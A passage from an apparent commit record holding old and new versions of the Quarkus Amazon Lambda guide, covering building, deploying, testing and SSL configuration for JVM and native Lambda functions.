`bootstrap`. This is a requirement of the AWS Lambda\nCustom (Provided) Runtime.\n\nThe instructions here are exactly as above with one change: you'll need to add `native` as the first parameter to the\n`manage.sh` script:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh native create\n----\n\nAs above, commands can be stacked. The only requirement is that `native` be the first parameter should you wish\nto work with native image builds. The script will take care of the rest of the details necessary to manage your native\nimage function deployments.\n\nExamine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\nOne thing to note about the create command for native is that the `aws lambda create-function`\ncall must set a specific environment variable:\n\n[source,bash,subs=attributes+]\n----\n--environment 'Variables={DISABLE_SIGNAL_HANDLERS=true}'\n----\n\n== Examine the POM and Gradle build\n\nThere is nothing special about the POM other than the inclusion of the `quarkus-amazon-lambda` and `quarkus-test-amazon-lambda` extensions\nas a dependencies. The extension automatically generates everything you might need for your lambda deployment.\n\nNOTE: In previous versions of this extension you had to set up your pom or gradle\nto zip up your executable for native deployments, but this is not the case anymore.\n\n[[gradle]]\n== Gradle build\n\nSimilarly for Gradle projects, you also just have to add the `quarkus-amazon-lambda` and\n`quarkus-test-amazon-lambda` dependencies. The extension automatically generates everything you might need\nfor your lambda deployment.\n\nExample Gradle dependencies:\n\n[source,groovy]\n----\ndependencies {\n implementation enforcedPlatform(\"${quarkusPlatformGroupId}:${quarkusPlatformArtifactId}:${quarkusPlatformVersion}\")\n implementation 'io.quarkus:quarkus-resteasy'\n implementation 'io.quarkus:quarkus-amazon-lambda'\n\n testimplementation \"io.quarkus:quarkus-test-amazon-lambda\"\n\n testImplementation 'io.quarkus:quarkus-junit5'\n testImplementation 'io.rest-assured:rest-assured'\n}\n----\n\n\n== Integration Testing\nThe Quarkus Amazon Lambda extension has a matching test framework that provides functionality to execute standard JUnit tests on your AWS Lambda function,\nvia the integration layer that Quarkus provides. This is true for both JVM and native modes.\nIt provides similar functionality to the SAM CLI, without the overhead of Docker.\n\nTo illustrate, the project generated by the Maven archetype, generates a JUnit test for the `RequestHandler<?, ?>` implementation, which is shown below.\nThe test replicates the execution environment, for the function that is selected for invocation, as described <<choose, above>>.\n\nTo use the integration tests in your project there is a required property, in `src\/test\/resources\/application.properties`. If not included, the integration tests will be in a constant loop.\n\n[source,properties]\n----\nquarkus.lambda.enable-polling-jvm-mode=true\n----\n\nNOTE: If you are following along with the example Maven archetype project for AWS Lambda in this guide,\nit includes the required property `quarkus.lambda.enable-polling-jvm-mode=true` in the test `application.properties`.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaHandlerTest {\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n InputObject in = new InputObject();\n in.setGreeting(\"Hello\");\n in.setName(\"Stu\");\n\n OutputObject out = LambdaClient.invoke(OutputObject.class, in);\n\n Assertions.assertEquals(\"Hello Stu\", out.getResult());\n Assertions.assertTrue(out.getRequestId().matches(\"aws-request-\\\\d\"), \"Expected requestId as 'aws-request-<number>'\");\n }\n}\n----\n\nSimilarly, if you are using a `RequestStreamHandler` implementation, you can add a matching JUnit test, like below,\nwhich aligns to the generated `StreamLambda` class in the generated project.\n\nObviously, these two types of tests are mutually exclusive. You must have a test that corresponds to the implemented AWS Lambda interfaces,\nwhether `RequestHandler<?, ?>` or `RequestStreamHandler`.\n\nTwo versions of the Test for `RequestStreamHandler` are presented below. You can use either, depending on\nthe needs of your Unit test. The first is obviously simpler and quicker. Using Java streams can require more coding.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaStreamHandlerTest {\n\n private static Logger LOG = Logger.getLogger(LambdaStreamHandlerTest.class);\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n String out = LambdaClient.invoke(String.class, \"lowercase\");\n Assertions.assertEquals(\"LOWERCASE\", out);\n }\n\n @Test\n public void testInputStreamSuccess() {\n try {\n String input = \"{ \\\"name\\\": \\\"Bill\\\", \\\"greeting\\\": \\\"hello\\\"}\";\n InputStream inputStream = new ByteArrayInputStream(input.getBytes());\n ByteArrayOutputStream outputStream = new ByteArrayOutputStream();\n\n LambdaClient.invoke(inputStream, outputStream);\n\n ByteArrayInputStream out = new ByteArrayInputStream(outputStream.toByteArray());\n StringBuilder response = new StringBuilder();\n int i = 0;\n while ((i = out.read()) != -1) {\n response.append((char)i);\n }\n\n Assertions.assertTrue(response.toString().contains(\"BILL\"));\n } catch (Exception e) {\n Assertions.fail(e.getMessage());\n }\n }\n\n}\n----\n\nIf your code uses CDI injection, this too will be executed, along with mocking functionality, see the link:getting-started-testing[Test Guide] for more details.\n\nTo add JUnit functionality for native tests, add the `@NativeImageTest` annotation to a subclass of your test class, which will execute against your native image, and can be leveraged in an IDE.\n\n\n== Testing with the SAM CLI\n\nThe https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI]\nallows you to run your lambdas locally on your laptop in a simulated Lambda environment. This requires\nhttps:\/\/www.docker.com\/products\/docker-desktop[docker] to be installed. This is an optional approach should you choose\nto take advantage of it. Otherwise, the Quarkus JUnit integration should be sufficient for most of your needs.\n\nA starter template has been generated for both JVM and native execution modes.\n\nRun the following SAM CLI command to locally test your lambda function, passing the appropriate SAM `template`.\nThe `event` parameter takes any JSON file, in this case the sample `payload.json`.\n\nNOTE: If using Gradle, the path to the binaries in the YAML templates must be changed from `target` to `build`\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nThe native image can also be locally tested using the `sam.native.yaml` template:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Modifying `function.zip`\n\nThe are times where you may have to add some additions to the `function.zip` lambda deployment that is generated\nby the build. To do this create a `zip.jvm` or `zip.native` directory within `src\/main`.\nCreate `zip.jvm\/` if you are doing a pure Java lambda. `zip.native\/` if you are doing a native deployment.\n\nAny you files and directories you create under your zip directory will be included within `function.zip`\n\n== Custom `bootstrap` script\n\nThere are times you may want to set a specific system properties or other arguments when lambda invokes\nyour native quarkus lambda deployment. If you include a `bootstrap` script file within\n`zip.native`, the quarkus extension will automatically rename the executable to `runner` within\n`function.zip` and set the unix mode of the `bootstrap` script to executable.\n\nNOTE: The native executable must be referenced as `runner` if you include a custom `bootstrap` script.\n\nThe extension generates an example script within `target\/bootstrap-example.sh`.\n\n== Tracing with AWS XRay and GraalVM\n\nIf you are building native images, and want to use https:\/\/aws.amazon.com\/xray[AWS X-Ray Tracing] with your lambda\nyou will need to include `quarkus-amazon-lambda-xray` as a dependency in your pom. The AWS X-Ray\nlibrary is not fully compatible with GraalVM so we had to do some integration work to make this work.\n\nIn addition, remember to enable the AWS X-Ray tracing parameter in `manage.sh`, in the `cmd_create()` function. This can also be set in the AWS Management Console.\n[source,bash]\n----\n --tracing-config Mode=Active\n----\n\nFor the sam template files, add the following to the YAML function Properties.\n[source]\n----\n Tracing: Active\n----\n\nAWS X-Ray does add many classes to your distribution, do ensure you are using at least the 256MB AWS Lambda memory size.\nThis is explicitly set in `manage.sh` `cmd_create()`. Whilst the native image potentially can always use a lower memory setting, it would be recommended to keep the setting the same, especially to help compare performance.\n\n[[https]]\n== Using HTTPS or SSL\/TLS\n\nIf your code makes HTTPS calls, such as to a micro-service (or AWS service), you will need to add configuration to the native image,\nas GraalVM will only include the dependencies when explicitly declared. Quarkus, by default enables this functionality on extensions that implicitly require it.\nFor further information, please consult the link:native-and-ssl[Quarkus SSL guide]\n\nOpen src\/main\/resources\/application.properties and add the following line to enable SSL in your native image.\n\n[source,properties]\n----\nquarkus.ssl.native=true\n----\n\n[[aws-sdk-v2]]\n== Using the AWS Java SDK v2\n\nNOTE: Quarkus now has extensions for DynamoDB, S3, SNS and SQS (more coming). Please check those guides on how to use the various AWS Services with Quarkus, as opposed to wiring manually like below.\n\nWith minimal integration, it is possible to leverage the AWS Java SDK v2,\nwhich can be used to invoke services such as SQS, SNS, S3 and DynamoDB.\n\nFor native image, however the URL Connection client must be preferred over the Apache HTTP Client\nwhen using synchronous mode, due to issues in the GraalVM compilation (at present).\n\nAdd `quarkus-jaxb` as a dependency in your Maven `pom.xml`, or Gradle `build.gradle` file.\n\nYou must also force your AWS service client for SQS, SNS, S3 et al, to use the URL Connection client,\nwhich connects to AWS services over HTTPS, hence the inclusion of the SSL enabled property, as described in the <<https>> section above.\n\n[source,java]\n----\n\/\/ select the appropriate client, in this case SQS, and\n\/\/ insert your region, instead of XXXX, which also improves startup time over the default client\n client = SqsClient.builder().region(Region.XXXX).httpClient(software.amazon.awssdk.http.urlconnection.UrlConnectionHttpClient.builder().build()).build();\n----\n\nFor Maven, add the following to your `pom.xml`.\n\n[source,xml]\n----\n\n <properties>\n <aws.sdk2.version>2.10.69<\/aws.sdk2.version>\n <\/properties>\n\n <dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>bom<\/artifactId>\n <version>${aws.sdk2.version}<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n\n <\/dependencies>\n <\/dependencyManagement>\n <dependencies>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>url-connection-client<\/artifactId>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>software.amazon.awssdk<\/groupId>\n <!-- sqs\/sns\/s3 etc -->\n <artifactId>sqs<\/artifactId>\n <exclusions>\n <!-- exclude the apache-client and netty client -->\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>apache-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>software.amazon.awssdk<\/groupId>\n <artifactId>netty-nio-client<\/artifactId>\n <\/exclusion>\n <exclusion>\n <groupId>commons-logging<\/groupId>\n <artifactId>commons-logging<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n\n <dependency>\n <groupId>org.jboss.logging<\/groupId>\n <artifactId>commons-logging-jboss-logging<\/artifactId>\n <version>1.0.0.Final<\/version>\n <\/dependency>\n <\/dependencies>\n----\n\nNOTE: if you see `java.security.InvalidAlgorithmParameterException: the trustAnchors parameter must be non-empty` or similar SSL error, due to the current status of GraalVM,\nthere is some additional work to bundle the `function.zip`, as below. For more information, please see the link:native-and-ssl[Quarkus Native SSL Guide].\n\n== Additional requirements for client SSL\n\nThe native executable requires some additional steps to enable client ssl that S3 and other aws libraries need.\n\n1. A custom `bootstrap` script\n2. `libsunec.so` must be added to `function.zip`\n3. `cacerts` must be added to `function.zip`\n\nTo do this, first create a directory `src\/main\/zip.native\/` with your build. Next create a shell script file called `bootstrap`\nwithin `src\/main\/zip.native\/`, like below. An example is create automatically in your build folder (target or build), called `bootstrap-example.sh`\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n\n.\/runner -Djava.library.path=.\/ -Djavax.net.ssl.trustStore=.\/cacerts\n----\n\nAdditional set `-Djavax.net.ssl.trustStorePassword=changeit` if your `cacerts` file is password protected.\n\nNext you must copy some files from your GraalVM distribution into `src\/main\/zip.native\/`.\n\nNOTE: GraalVM versions can have different paths for these files, and whether you using the Java 8 or 11 version. Adjust accordingly.\n\n[source,bash]\n----\ncp $GRAALVM_HOME\/lib\/libsunec.so $PROJECT_DIR\/src\/main\/zip.native\/\ncp $GRAALVM_HOME\/lib\/security\/cacerts $PROJECT_DIR\/src\/main\/zip.native\/\n----\n\nNow when you run the native build all these files will be included within `function.zip`\n\nNOTE: If you are using a Docker image to build, then you must extract these files from this image.\n\nTo extract the required ssl, you must start up a Docker container in the background, and attach to that container to copy the artifacts.\n\nFirst, let's start the GraalVM container, noting the container id output.\n[source,bash,subs=attributes+]\n----\ndocker run -it -d --entrypoint bash quay.io\/quarkus\/ubi-quarkus-native-image:{graalvm-flavor}\n\n# This will output a container id, like 6304eea6179522aff69acb38eca90bedfd4b970a5475aa37ccda3585bc2abdde\n# Note this value as we will need it for the commands below\n----\n\nFirst, libsunec.so, the C library used for the SSL implementation:\n\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/lib\/libsunec.so src\/main\/zip.native\/\n----\n\nSecond, cacerts, the certificate store. You may need to periodically obtain an updated copy, also.\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/lib\/security\/cacerts src\/main\/zip.native\/\n----\n\nYour final archive will look like this:\n[source,bash]\n----\njar tvf target\/function.zip\n\n bootstrap\n runner\n cacerts\n libsunec.so\n----\n\n== Amazon Alexa Integration\n\nTo use Alexa with Quarkus native, please add the following extension.\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-amazon-alexa<\/artifactId>\n <\/dependency>\n----\n\nCreate your Alexa handler, as normal, by sub-classing the abstract `com.amazon.ask.SkillStreamHandler`, and add your request handler implementation.\n\nThat's all there is to it!\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Amazon Lambda\n:extension-status: preview\n\ninclude::.\/attributes.adoc[]\n\nThe `quarkus-amazon-lambda` extension allows you to use Quarkus to build your AWS Lambdas.\nYour lambdas can use injection annotations from CDI or Spring and other Quarkus facilities as you need them.\n\nQuarkus lambdas can be deployed using the Amazon Java Runtime, or you can build a native executable and use\nAmazon's Custom Runtime if you want a smaller memory footprint and faster cold boot startup time.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 30 minutes\n* JDK 11 (AWS requires JDK 1.8 or 11)\n* Apache Maven {maven-version}\n* https:\/\/aws.amazon.com[An Amazon AWS account]\n* https:\/\/docs.aws.amazon.com\/cli\/latest\/userguide\/cli-chap-install.html[AWS CLI]\n* https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI], for local testing\n\nNOTE: For Gradle projects please <<gradle,see below>>, or for further reference consult the guide in the link:gradle-tooling[Gradle setup page].\n\n== Getting Started\n\nThis guide walks you through generating an example Java project via a maven archetype and deploying it to AWS.\n\n== Installing AWS bits\n\nInstalling all the AWS bits is probably the most difficult thing about this guide. Make sure that you follow all the steps\nfor installing AWS CLI.\n\n== Creating the Maven Deployment Project\n\nCreate the Quarkus AWS Lambda maven project using our Maven Archetype.\n\n\n[source,bash,subs=attributes+]\n----\nmvn archetype:generate \\\n -DarchetypeGroupId=io.quarkus \\\n -DarchetypeArtifactId=quarkus-amazon-lambda-archetype \\\n -DarchetypeVersion={quarkus-version}\n----\n\n[NOTE]\n====\nIf you prefer to use Gradle, you can quickly and easily generate a Gradle project via https:\/\/code.quarkus.io\/[code.quarkus.io]\nadding the `quarkus-amazon-lambda` extension as a dependency.\n\nCopy the build.gradle, gradle.properties and settings.gradle into the above generated Maven archetype project, to follow along with this guide.\n\nExecute: gradle wrapper to setup the gradle wrapper (recommended).\n\nThe dependency for `quarkus-test-amazon-lambda` will also need to be added to your build.gradle.\n\nFor full Gradle details <<gradle, see below>>.\n====\n\n[[choose]]\n== Choose Your Lambda\n\nThe `quarkus-amazon-lambda` extension scans your project for a class that directly implements the Amazon `RequestHandler<?, ?>` or `RequestStreamHandler` interface.\nIt must find a class in your project that implements this interface or it will throw a build time failure.\nIf it finds more than one handler class, a build time exception will also be thrown.\n\nSometimes, though, you might have a few related lambdas that share code and creating multiple maven modules is just\nan overhead you don't want to do. The `quarkus-amazon-lambda` extension allows you to bundle multiple lambdas in one\nproject and use configuration or an environment variable to pick the handler you want to deploy.\n\nThe generated project has three lambdas within it. Two that implement the `RequestHandler<?, ?>` interface, and one that implements the `RequestStreamHandler` interface. One that is used and two that are unused. If you open up\n`src\/main\/resources\/application.properties` you'll see this:\n\n[source,properties,subs=attributes+]\n----\nquarkus.lambda.handler=test\n----\n\nThe `quarkus.lambda.handler` property tells Quarkus which lambda handler to deploy. This can be overridden\nwith an environment variable too.\n\nIf you look at the three generated handler classes in the project, you'll see that they are `@Named` differently.\n\n[source,java,subs=attributes+]\n----\n@Named(\"test\")\npublic class TestLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"unused\")\npublic class UnusedLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"stream\")\npublic class StreamLambda implements RequestStreamHandler {\n}\n----\n\nThe CDI name of the handler class must match the value specified within the `quarkus.lambda.handler` property.\n\n\n== Deploy to AWS Lambda Java Runtime\n\nThere are a few steps to get your lambda running on AWS. The generated maven project contains a helpful script to\ncreate, update, delete, and invoke your lambdas for pure Java and native deployments.\n\n== Build and Deploy\n\nBuild the project using maven.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean package\n----\n\nor, if using Gradle:\n----\n.\/gradlew clean assemble\n----\n\nThis will compile and package your code.\n\n== Create an Execution Role\n\nView the https:\/\/docs.aws.amazon.com\/lambda\/latest\/dg\/gettingstarted-awscli.html[Getting Started Guide] for deploying\na lambda with AWS CLI. Specifically, make sure you have created an `Execution Role`. You will need to define\na `LAMBDA_ROLE_ARN` environment variable in your profile or console window, Alternatively, you can edit\nthe `manage.sh` script that is generated by the build and put the role value directly there:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\"\n----\n\n== Extra Build Generated Files\n\nAfter you run the build, there are a few extra files generated by the `quarkus-amazon-lambda` extension. These files\nare in the the build directory: `target\/` for maven, `build\/` for gradle.\n\n* `function.zip` - lambda deployment file\n* `manage.sh` - wrapper around aws lambda cli calls\n* `bootstrap-example.sh` - example bootstrap script for native deployments\n* `sam.jvm.yaml` - (optional) for use with sam cli and local testing\n* `sam.native.yaml` - (optional) for use with sam cli and native local testing\n\n== Create the function\n\nThe `target\/manage.sh` script is for managing your lambda using the AWS Lambda Java runtime. This script is provided only for\nyour convenience. Examine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\n`manage.sh` supports four operation: `create`, `delete`, `update`, and `invoke`.\n\nNOTE: To verify your setup, that you have the AWS CLI installed, executed aws configure for the AWS access keys,\nand setup the `LAMBDA_ROLE_ARN` environment variable (as described above), please execute `manage.sh` without any parameters.\nA usage statement will be printed to guide you accordingly.\n\nNOTE: If using Gradle, the path to the binaries in the `manage.sh` must be changed from `target` to `build`\n\nTo see the `usage` statement, and validate AWS configuration:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh\n----\n\nYou can `create` your function using the following command:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh create\n----\n\nor if you do not have `LAMBDA_ROLE_ARN` already defined in this shell:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\" sh target\/manage.sh create\n----\n\nWARNING: Do not change the handler switch. This must be hardcoded to `io.quarkus.amazon.lambda.runtime.QuarkusStreamHandler::handleRequest`. This\nhandler bootstraps Quarkus and wraps your actual handler so that injection can be performed.\n\nIf there are any problems creating the function, you must delete it with the `delete` function before re-running\nthe `create` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete\n----\n\nCommands may also be stacked:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete create\n----\n\n== Invoke the Lambda\n\nUse the `invoke` command to invoke your function.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh invoke\n----\n\nThe example lambda takes input passed in via the `--payload` switch which points to a json file\nin the root directory of the project.\n\nThe lambda can also be invoked locally with the SAM CLI like this:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nIf you are working with your native image build, simply replace the template name with the native version:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Update the Lambda\n\nYou can update the Java code as you see fit. Once you've rebuilt, you can redeploy your lambda by executing the\n`update` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh update\n----\n\n== Deploy to AWS Lambda Custom (native) Runtime\n\nIf you want a lower memory footprint and faster initialization times for your lambda, you can compile your Java\ncode to a native executable. Just make sure to rebuild your project with the `-Pnative` switch.\n\nFor Linux hosts execute:\n\n[source,bash,subs=attributes+]\n----\nmvn package -Pnative\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native\n----\n\nNOTE: If you are building on a non-Linux system, you will need to also pass in a property instructing quarkus to use a docker build as Amazon\nLambda requires linux binaries. You can do this by passing this property to your Maven build:\n`-Dnative-image.docker-build=true`, or for Gradle: `--docker-build=true`. This requires you to have docker installed locally, however.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean install -Pnative -Dnative-image.docker-build=true\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native -Dquarkus.native.container-build=true\n----\n\nEither of these commands will compile and create a native executable image. It also generates a zip file `target\/function.zip`.\nThis zip file contains your native executable image renamed to `bootstrap`. This is a requirement of the AWS Lambda\nCustom (Provided) Runtime.\n\nThe instructions here are exactly as above with one change: you'll need to add `native` as the first parameter to the\n`manage.sh` script:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh native create\n----\n\nAs above, commands can be stacked. The only requirement is that `native` be the first parameter should you wish\nto work with native image builds. The script will take care of the rest of the details necessary to manage your native\nimage function deployments.\n\nExamine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\nOne thing to note about the create command for native is that the `aws lambda create-function`\ncall must set a specific environment variable:\n\n[source,bash,subs=attributes+]\n----\n--environment 'Variables={DISABLE_SIGNAL_HANDLERS=true}'\n----\n\n== Examine the POM and Gradle build\n\nThere is nothing special about the POM other than the inclusion of the `quarkus-amazon-lambda` and `quarkus-test-amazon-lambda` extensions\nas a dependencies. The extension automatically generates everything you might need for your lambda deployment.\n\nNOTE: In previous versions of this extension you had to set up your pom or gradle\nto zip up your executable for native deployments, but this is not the case anymore.\n\n[[gradle]]\n== Gradle build\n\nSimilarly for Gradle projects, you also just have to add the `quarkus-amazon-lambda` and\n`quarkus-test-amazon-lambda` dependencies. The extension automatically generates everything you might need\nfor your lambda deployment.\n\nExample Gradle dependencies:\n\n[source,groovy]\n----\ndependencies {\n implementation enforcedPlatform(\"${quarkusPlatformGroupId}:${quarkusPlatformArtifactId}:${quarkusPlatformVersion}\")\n implementation 'io.quarkus:quarkus-resteasy'\n implementation 'io.quarkus:quarkus-amazon-lambda'\n\n testimplementation \"io.quarkus:quarkus-test-amazon-lambda\"\n\n testImplementation 'io.quarkus:quarkus-junit5'\n testImplementation 'io.rest-assured:rest-assured'\n}\n----\n\n\n== Integration Testing\nThe Quarkus Amazon Lambda extension has a matching test framework that provides functionality to execute standard JUnit tests on your AWS Lambda function,\nvia the integration layer that Quarkus provides. This is true for both JVM and native modes.\nIt provides similar functionality to the SAM CLI, without the overhead of Docker.\n\nTo illustrate, the project generated by the Maven archetype, generates a JUnit test for the `RequestHandler<?, ?>` implementation, which is shown below.\nThe test replicates the execution environment, for the function that is selected for invocation, as described <<choose, above>>.\n\nTo use the integration tests in your project there is a required property, in `src\/test\/resources\/application.properties`. If not included, the integration tests will be in a constant loop.\n\n[source,properties]\n----\nquarkus.lambda.enable-polling-jvm-mode=true\n----\n\nNOTE: If you are following along with the example Maven archetype project for AWS Lambda in this guide,\nit includes the required property `quarkus.lambda.enable-polling-jvm-mode=true` in the test `application.properties`.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaHandlerTest {\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n InputObject in = new InputObject();\n in.setGreeting(\"Hello\");\n in.setName(\"Stu\");\n\n OutputObject out = LambdaClient.invoke(OutputObject.class, in);\n\n Assertions.assertEquals(\"Hello Stu\", out.getResult());\n Assertions.assertTrue(out.getRequestId().matches(\"aws-request-\\\\d\"), \"Expected requestId as 'aws-request-<number>'\");\n }\n}\n----\n\nSimilarly, if you are using a `RequestStreamHandler` implementation, you can add a matching JUnit test, like below,\nwhich aligns to the generated `StreamLambda` class in the generated project.\n\nObviously, these two types of tests are mutually exclusive. You must have a test that corresponds to the implemented AWS Lambda interfaces,\nwhether `RequestHandler<?, ?>` or `RequestStreamHandler`.\n\nTwo versions of the Test for `RequestStreamHandler` are presented below. You can use either, depending on\nthe needs of your Unit test. The first is obviously simpler and quicker. Using Java streams can require more coding.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaStreamHandlerTest {\n\n private static Logger LOG = Logger.getLogger(LambdaStreamHandlerTest.class);\n\n @Test\n public void testSimpleLambdaSuccess() throws Exception {\n String out = LambdaClient.invoke(String.class, \"lowercase\");\n Assertions.assertEquals(\"LOWERCASE\", out);\n }\n\n @Test\n public void testInputStreamSuccess() {\n try {\n String input = \"{ \\\"name\\\": \\\"Bill\\\", \\\"greeting\\\": \\\"hello\\\"}\";\n InputStream inputStream = new ByteArrayInputStream(input.getBytes());\n ByteArrayOutputStream outputStream = new ByteArrayOutputStream();\n\n LambdaClient.invoke(inputStream, outputStream);\n\n ByteArrayInputStream out = new ByteArrayInputStream(outputStream.toByteArray());\n StringBuilder response = new StringBuilder();\n int i = 0;\n while ((i = out.read()) != -1) {\n response.append((char)i);\n }\n\n Assertions.assertTrue(response.toString().contains(\"BILL\"));\n } catch (Exception e) {\n Assertions.fail(e.getMessage());\n }\n }\n\n}\n----\n\nIf your code uses CDI injection, this too will be executed, along with mocking functionality, see the link:getting-started-testing[Test Guide] for more details.\n\nTo add JUnit functionality for native tests, add the `@NativeImageTest` annotation to a subclass of your test class, which will execute against your native image, and can be leveraged in an IDE.\n\n\n== Testing with the SAM CLI\n\nThe https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI]\nallows you to run your lambdas locally on your laptop in a simulated Lambda environment. This requires\nhttps:\/\/www.docker.com\/products\/docker-desktop[docker] to be installed. This is an optional approach should you choose\nto take advantage of it. Otherwise, the Quarkus JUnit integration should be sufficient for most of your needs.\n\nA starter template has been generated for both JVM and native execution modes.\n\nRun the following SAM CLI command to locally test your lambda function, passing the appropriate SAM `template`.\nThe `event` parameter takes any JSON file, in this case the sample `payload.json`.\n\nNOTE: If using Gradle, the path to the binaries in the YAML templates must be changed from `target` to `build`\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nThe native image can also be locally tested using the `sam.native.yaml` template:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Modifying `function.zip`\n\nThe are times where you may have to add some additions to the `function.zip` lambda deployment that is generated\nby the build. To do this create a `zip.jvm` or `zip.native` directory within `src\/main`.\nCreate `zip.jvm\/` if you are doing a pure Java lambda. `zip.native\/` if you are doing a native deployment.\n\nAny you files and directories you create under your zip directory will be included within `function.zip`\n\n== Custom `bootstrap` script\n\nThere are times you may want to set a specific system properties or other arguments when lambda invokes\nyour native quarkus lambda deployment. If you include a `bootstrap` script file within\n`zip.native`, the quarkus extension will automatically rename the executable to `runner` within\n`function.zip` and set the unix mode of the `bootstrap` script to executable.\n\nNOTE: The native executable must be referenced as `runner` if you include a custom `bootstrap` script.\n\nThe extension generates an example script within `target\/bootstrap-example.sh`.\n\n== Tracing with AWS XRay and GraalVM\n\nIf you are building native images, and want to use https:\/\/aws.amazon.com\/xray[AWS X-Ray Tracing] with your lambda\nyou will need to include `quarkus-amazon-lambda-xray` as a dependency in your pom. The AWS X-Ray\nlibrary is not fully compatible with GraalVM so we had to do some integration work to make this work.\n\nIn addition, remember to enable the AWS X-Ray tracing parameter in `manage.sh`, in the `cmd_create()` function. This can also be set in the AWS Management Console.\n[source,bash]\n----\n --tracing-config Mode=Active\n----\n\nFor the sam template files, add the following to the YAML function Properties.\n[source]\n----\n Tracing: Active\n----\n\nAWS X-Ray does add many classes to your distribution, do ensure you are using at least the 256MB AWS Lambda memory size.\nThis is explicitly set in `manage.sh` `cmd_create()`. Whilst the native image potentially can always use a lower memory setting, it would be recommended to keep the setting the same, especially to help compare performance.\n\n[[https]]\n== Using HTTPS or SSL\/TLS\n\nIf your code makes HTTPS calls, such as to a micro-service (or AWS service), you will need to add configuration to the native image,\nas GraalVM will only include the dependencies when explicitly declared. Quarkus, by default enables this functionality on extensions that implicitly require it.\nFor further information, please consult the link:native-and-ssl[Quarkus SSL guide]\n\nOpen src\/main\/resources\/application.properties and add the following line to enable SSL in your native image.\n\n[source,properties]\n----\nquarkus.ssl.native=true\n----\n\n[[aws-sdk-v2]]\n== Using the AWS Java SDK v2\n\nNOTE: Quarkus now has extensions for DynamoDB, S3, SNS and SQS (more coming). Please check those guides on how to use the various AWS Services with Quarkus, as opposed to wiring manually like below.\n\nWith minimal integration, it is possible to leverage the AWS Java SDK v2,\nwhich can be used to invoke services such as SQS, SNS, S3 and DynamoDB.\n\nFor native image, however the URL Connection client must be preferred over the Apache HTTP Client\nwhen using synchronous mode, due to issues in the GraalVM compilation (at present).\n\nAdd `quarkus-jaxb` as a dependency in your Maven `pom.xml`, or Gradle `build.gradle` file.\n\nYou must also force your AWS service client for SQS, SNS, S3 et al, to use the URL Connection client,\nwhich connects to AWS services over HTTPS, hence the inclusion of the SSL enabled property, as described in the <<https>> section above.\n\n[source,java]\n----\n\/\/ select the appropriate client, in this case SQS, and\n\/\/ insert your region, instead of XXXX, which also improves startup time over the default client\n client = 